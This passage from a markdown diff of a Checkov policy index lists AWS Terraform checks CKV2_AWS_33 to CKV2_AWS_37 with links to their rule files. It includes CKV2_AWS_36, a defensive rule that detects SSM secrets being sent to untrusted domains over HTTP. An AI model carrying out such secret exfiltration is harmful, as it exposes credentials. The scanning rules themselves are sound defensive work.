[CloudFrontHasResponseHeadersPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasResponseHeadersPolicy.yaml) | +| 560 | CKV2_AWS_33 | resource | aws_appsync_graphql_api | Ensure AppSync is protected by WAF | Terraform | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppSyncProtectedByWAF.yaml) | +| 561 | CKV2_AWS_34 | resource | aws_ssm_parameter | AWS SSM Parameter should be Encrypted | Terraform | [AWSSSMParameterShouldBeEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSSSMParameterShouldBeEncrypted.yaml) | +| 562 | CKV2_AWS_35 | resource | aws_route | AWS NAT Gateways should be utilized for the default route | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml) | +| 563 | CKV2_AWS_35 | resource | aws_route_table | AWS NAT Gateways should be utilized for the default route | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml) | +| 564 | CKV2_AWS_36 | resource | aws_ssm_parameter | Ensure terraform is not sending SSM secrets to untrusted domains over HTTP | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml) | +| 565 | CKV2_AWS_36 | resource | data.http | Ensure terraform is not sending SSM secrets to untrusted domains over HTTP | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml) | +| 566 | CKV2_AWS_37 | resource | aws | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 567 | CKV2_AWS_37 | resource | aws_accessanalyzer_analyzer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 568 | CKV2_AWS_37 | resource | aws_acm_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 569 | CKV2_AWS_37 | resource | aws_acm_certificate_validation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 570 | CKV2_AWS_37 | resource | aws_acmpca_certificate_authority | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 571 | CKV2_AWS_37 | resource | aws_ami | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 572 | CKV2_AWS_37 | resource | aws_ami_copy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 573 | CKV2_AWS_37 | resource | aws_ami_from_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 574 | CKV2_AWS_37 | resource | aws_ami_launch_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 575 | CKV2_AWS_37 | resource | aws_api_gateway_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 576 | CKV2_AWS_37 | resource | aws_api_gateway_api_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 577 | CKV2_AWS_37 | resource | aws_api_gateway_authorizer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 578 | CKV2_AWS_37 | resource | aws_api_gateway_base_path_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 579 | CKV2_AWS_37 | resource | aws_api_gateway_client_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 580 | CKV2_AWS_37 | resource | aws_api_gateway_deployment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 581 | CKV2_AWS_37 | resource | aws_api_gateway_documentation_part | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 582 | CKV2_AWS_37 | resource | aws_api_gateway_documentation_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 583 | CKV2_AWS_37 | resource | aws_api_gateway_domain_name | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 584 | CKV2_AWS_37 | resource | aws_api_gateway_gateway_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 585 | CKV2_AWS_37 | resource | aws_api_gateway_integration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 586 | CKV2_AWS_37 | resource | aws_api_gateway_integration_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 587 | CKV2_AWS_37 | resource | aws_api_gateway_method | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 588 | CKV2_AWS_37 | resource | aws_api_gateway_method_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 589 | CKV2_AWS_37 | resource | aws_api_gateway_method_settings | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 590 | CKV2_AWS_37 | resource | aws_api_gateway_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 591 | CKV2_AWS_37 | resource | aws_api_gateway_request_validator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 592 | CKV2_AWS_37 | resource | aws_api_gateway_resource | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 593 | CKV2_AWS_37 | resource | aws_api_gateway_rest_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 594 | CKV2_AWS_37 | resource | aws_api_gateway_stage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 595 | CKV2_AWS_37 | resource | aws_api_gateway_usage_plan | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 596 | CKV2_AWS_37 | resource | aws_api_gateway_usage_plan_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 597 | CKV2_AWS_37 | resource | aws_api_gateway_vpc_link | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 598 | CKV2_AWS_37 | resource | aws_apigatewayv2_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 599 | CKV2_AWS_37 | resource | aws_apigatewayv2_api_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 600 | CKV2_AWS_37 | resource | aws_apigatewayv2_authorizer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 601 | CKV2_AWS_37 | resource | aws_apigatewayv2_deployment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 602 | CKV2_AWS_37 | resource | aws_apigatewayv2_domain_name | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 603 | CKV2_AWS_37 | resource | aws_apigatewayv2_integration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 604 | CKV2_AWS_37 | resource | aws_apigatewayv2_integration_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 605 | CKV2_AWS_37 | resource | aws_apigatewayv2_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 606 | CKV2_AWS_37 | resource | aws_apigatewayv2_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 607 | CKV2_AWS_37 | resource | aws_apigatewayv2_route_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 608 | CKV2_AWS_37 | resource | aws_apigatewayv2_stage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 609 | CKV2_AWS_37 | resource | aws_apigatewayv2_vpc_link | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 610 | CKV2_AWS_37 | resource | aws_app_cookie_stickiness_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 611 | CKV2_AWS_37 | resource | aws_appautoscaling_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 612 | CKV2_AWS_37 | resource | aws_appautoscaling_scheduled_action | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 613 | CKV2_AWS_37 | resource | aws_appautoscaling_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 614 | CKV2_AWS_37 | resource | aws_appmesh_mesh | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 615 | CKV2_AWS_37 | resource | aws_appmesh_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 616 | CKV2_AWS_37 | resource | aws_appmesh_virtual_node | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 617 | CKV2_AWS_37 | resource | aws_appmesh_virtual_router | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 618 | CKV2_AWS_37 | resource | aws_appmesh_virtual_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 619 | CKV2_AWS_37 | resource | aws_appsync_api_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 620 | CKV2_AWS_37 | resource | aws_appsync_datasource | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 621 | CKV2_AWS_37 | resource | aws_appsync_function | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 622 | CKV2_AWS_37 | resource | aws_appsync_graphql_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 623 | CKV2_AWS_37 | resource | aws_appsync_resolver | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 624 | CKV2_AWS_37 | resource | aws_athena_database | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 625 | CKV2_AWS_37 | resource | aws_athena_named_query | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 626 | CKV2_AWS_37 | resource | aws_athena_workgroup | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 627 | CKV2_AWS_37 | resource | aws_autoscaling_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 628 | CKV2_AWS_37 | resource | aws_autoscaling_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 629 | CKV2_AWS_37 | resource | aws_autoscaling_lifecycle_hook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 630 | CKV2_AWS_37 | resource | aws_autoscaling_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 631 | CKV2_AWS_37 | resource | aws_autoscaling_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 632 | CKV2_AWS_37 | resource | aws_autoscaling_schedule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 633 | CKV2_AWS_37 | resource | aws_backup_plan | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 634 | CKV2_AWS_37 | resource | aws_backup_selection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 635 | CKV2_AWS_37 | resource | aws_backup_vault | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 636 | CKV2_AWS_37 | resource | aws_batch_compute_environment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 637 | CKV2_AWS_37 | resource | aws_batch_job_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 638 | CKV2_AWS_37 | resource | aws_batch_job_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 639 | CKV2_AWS_37 | resource | aws_budgets_budget | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 640 | CKV2_AWS_37 | resource | aws_cloud9_environment_ec2 | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 641 | CKV2_AWS_37 | resource | aws_cloudformation_stack | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 642 | CKV2_AWS_37 | resource | aws_cloudformation_stack_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 643 | CKV2_AWS_37 | resource | aws_cloudformation_stack_set_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 644 | CKV2_AWS_37 | resource | aws_cloudfront_distribution | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 645 | CKV2_AWS_37 | resource | aws_cloudfront_origin_access_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 646 | CKV2_AWS_37 | resource | aws_cloudfront_public_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 647 | CKV2_AWS_37 | resource | aws_cloudhsm_v2_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 648 | CKV2_AWS_37 | resource | aws_cloudhsm_v2_hsm | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 649 | CKV2_AWS_37 | resource | aws_cloudtrail | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 650 | CKV2_AWS_37 | resource | aws_cloudwatch_dashboard | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 651 | CKV2_AWS_37 | resource | aws_cloudwatch_event_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 652 | CKV2_AWS_37 | resource | aws_cloudwatch_event_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 653 | CKV2_AWS_37 | resource | aws_cloudwatch_event_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 654 | CKV2_AWS_37 | resource | aws_cloudwatch_log_destination | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 655 | CKV2_AWS_37 | resource | aws_cloudwatch_log_destination_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 656 | CKV2_AWS_37 | resource | aws_cloudwatch_log_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 657 | CKV2_AWS_37 | resource | aws_cloudwatch_log_metric_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 658 | CKV2_AWS_37 | resource | aws_cloudwatch_log_resource_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 659 | CKV2_AWS_37 | resource | aws_cloudwatch_log_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 660 | CKV2_AWS_37 | resource | aws_cloudwatch_log_subscription_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 661 | CKV2_AWS_37 | resource | aws_cloudwatch_metric_alarm | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 662 | CKV2_AWS_37 | resource | aws_codebuild_project | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 663 | CKV2_AWS_37 | resource | aws_codebuild_source_credential | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 664 | CKV2_AWS_37 | resource | aws_codebuild_webhook | Ensure CodeCommit associates an approval rule | Terraform | 